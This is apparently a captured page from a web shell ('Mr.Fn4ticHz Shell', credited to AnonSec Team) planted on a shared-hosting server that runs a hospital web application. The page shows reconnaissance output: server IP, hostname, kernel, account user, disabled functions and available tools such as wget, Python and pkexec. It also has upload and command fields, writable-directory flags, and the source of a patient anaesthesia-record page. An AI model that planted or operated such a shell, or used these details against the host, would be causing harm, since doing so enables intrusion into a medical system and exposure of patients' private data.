Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.136.18.141
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/Anaesthesia_record.php
<?php
session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');
include 'dashboarddocument.php';
include 'header.php';
?>

<?php 
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
		$sql ="SELECT * FROM patient WHERE patientid='54'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		    echo "

		    <div class='content-wrapper'>
    <!-- Content Header (Page header) -->
    <section class='content-header'>
    <div class='center'>
    <table id='example2' class='table table-bordered table-hover' width='100%'>
 <fieldset><legend>ANAESTHESIA RECORD</legend>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Name </td>
<td width='50%'>$rs[patientname]</td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  UHID :  </td>
<td width='50%'>$rs[patientid]</td>
</tr>
<tr>
<td width='50%'> &nbsp;  &nbsp; &nbsp; &nbsp; DOB:  </td>
<td width='50%'>$rs[dob]</td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; Sex : </td>
<td width='50%'>$rs[gendor]</td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; ADDRESS      : </td>
<td width='50%'>$rs[Country], $rs[State] ,$rs[city]  </td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; SURGEON  : </td>
<td width='50%'>$rs[Locality]</td>
</tr>
</table>
</fieldset>

</div>
 ";
	  echo "</td></tr>";	}
		?>
		<br>
	<?php 
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");
		$sql ="SELECT * FROM patient WHERE patientid='54'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		    echo "

    <div class='center'>
    <table id='example2' class='table table-bordered table-hover' width='100%'>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; PRE-OP-DIAGNOSIS: </td>
<td width='50%'></td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  OPERATIVE PROCEDURE: </td>
<td width='50%'></td>
</tr>
<tr>
<td width='50%'> &nbsp;  &nbsp; &nbsp; &nbsp; PRE MEDICATION:  </td>
<td width='50%'></td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; DRUG REACTION: </td>
<td width='50%'></td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; PHYSICAL STATUS     : </td>
<td width='50%'>  </td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; TYPE OF ANAESTHESIA : </td>
<td width='50%'></td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; TECHNIQUE USED: </td>
<td width='50%'></td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; BLOOD
WEIGHT
: </td>
<td width='50%'></td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; I/V CANNULA
: </td>
<td width='50%'></td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; SITE-FOREARM,WRIST,
FOOT,R/L,CUTOPEN
: </td>
<td width='50%'></td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; B.P
: </td>
<td width='50%'></td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; PULSE
: </td>
<td width='50%'></td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; HB
: </td>
<td width='50%'></td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; TEMP
: </td>
<td width='50%'></td>
</tr>
<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; RESP
: </td>
<td width='50%'></td>
</tr>
</table>
</fieldset>

</div>
 ";
	  echo "</td></tr>";	}
		?>
	

Anon7 - 2022
AnonSec Team